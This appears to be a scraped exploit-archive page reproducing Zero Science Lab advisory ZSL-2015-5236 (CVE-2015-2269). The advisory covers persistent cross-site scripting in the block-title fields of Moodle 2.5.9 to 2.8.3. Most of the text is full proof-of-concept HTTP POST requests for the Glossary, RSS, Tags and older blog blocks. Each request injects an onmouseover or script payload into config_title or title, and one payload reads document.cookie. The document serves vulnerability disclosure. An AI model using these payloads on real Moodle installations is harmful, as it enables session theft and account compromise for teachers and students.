扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 |
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting Vendor: Moodle Pty Ltd Product web page: https://www.moodle.org Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9 Summary: Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments. Desc: Moodle suffers from persistent XSS vulnerabilities. Input passed to the POST parameters 'config_title' and 'title' thru index.php, are not properly sanitized allowing the attacker to execute HTML or JS code into user's browser session on the affected site. Affected components: Blocks, Glossary, RSS and Tags. Tested on: nginx PHP/5.4.22 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5236 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php Vendor Advisory ID: MSA-15-0013 Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383 CVE ID: CVE-2015-2269 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269 09.02.2015 -- Random Glossary Entry --------------------- POST http://WEB/my/index.php HTTP/1.1 _qf__block_glossary_random_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=304 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_addentry=test config_invisible=test2 config_refresh=0 config_showconcept=1 config_title=" onmouseover=prompt("XSS1") > config_type=0 config_viewglossary=test3 mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Remote RSS Feeds ---------------- POST http://WEB/my/index.php HTTP/1.1 _qf__block_rss_client_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=312 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_block_rss_client_show_channel_image=0 config_block_rss_client_show_channel_link=0 config_display_description=0 config_rssid=_qf__force_multiselect_submission config_rssid[]=3 config_shownumentries=11 config_title=" onmouseover=prompt("XSS2") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Tags ---- POST http://WEB/my/index.php HTTP/1.1 _qf__block_tags_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=313 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_numberoftags=80 config_tagtype= config_title=Tags" onmouseover=prompt("XSS3") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Older not supported versions ---------------------------- POST http://WEB/blog/index.php HTTP/1.1 blockaction=config filterselect=1343 filtertype=user instanceid=4992 numberoftags=20 sesskey=0QCG5LQz0Q sort=name timewithin=90 title=ZSL"><script>alert(document.cookie);</script> |
体验盒子
